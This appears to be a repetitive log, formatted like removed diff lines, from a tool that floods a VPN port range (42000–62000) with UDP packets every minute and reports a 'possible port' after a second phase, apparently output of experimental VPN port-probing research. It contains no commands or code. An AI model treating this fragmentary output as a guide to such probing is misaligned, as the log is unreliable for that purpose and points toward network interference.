-Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:07:06 -Starting port fill at 2020-09-06 08:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:08:04 -Starting port fill at 2020-09-06 08:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:09:06 -Starting port fill at 2020-09-06 08:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:10:06 -Starting port fill at 2020-09-06 08:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:11:05 -Starting port fill at 2020-09-06 08:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:12:07 -Starting port fill at 2020-09-06 08:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:13:06 -Starting port fill at 2020-09-06 08:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:14:07 -Starting port fill at 2020-09-06 08:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:15:07 -Starting port fill at 2020-09-06 08:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:16:06 -Starting port fill at 2020-09-06 08:17:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:17:05 -Starting port fill at 2020-09-06 08:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:18:04 -Starting port fill at 2020-09-06 08:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:19:05 -Starting port fill at 2020-09-06 08:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:20:04 -Starting port fill at 2020-09-06 08:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:21:05 -Starting port fill at 2020-09-06 08:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:22:04 -Starting port fill at 2020-09-06 08:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:23:04 -Starting port fill at 2020-09-06 08:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:24:04 -Starting port fill at 2020-09-06 08:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:25:04 -Starting port fill at 2020-09-06 08:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:26:04 -Starting port fill at 2020-09-06 08:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:27:04 -Starting port fill at 2020-09-06 08:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:28:05 -Starting port fill at 2020-09-06 08:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:29:04 -Starting port fill at 2020-09-06 08:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 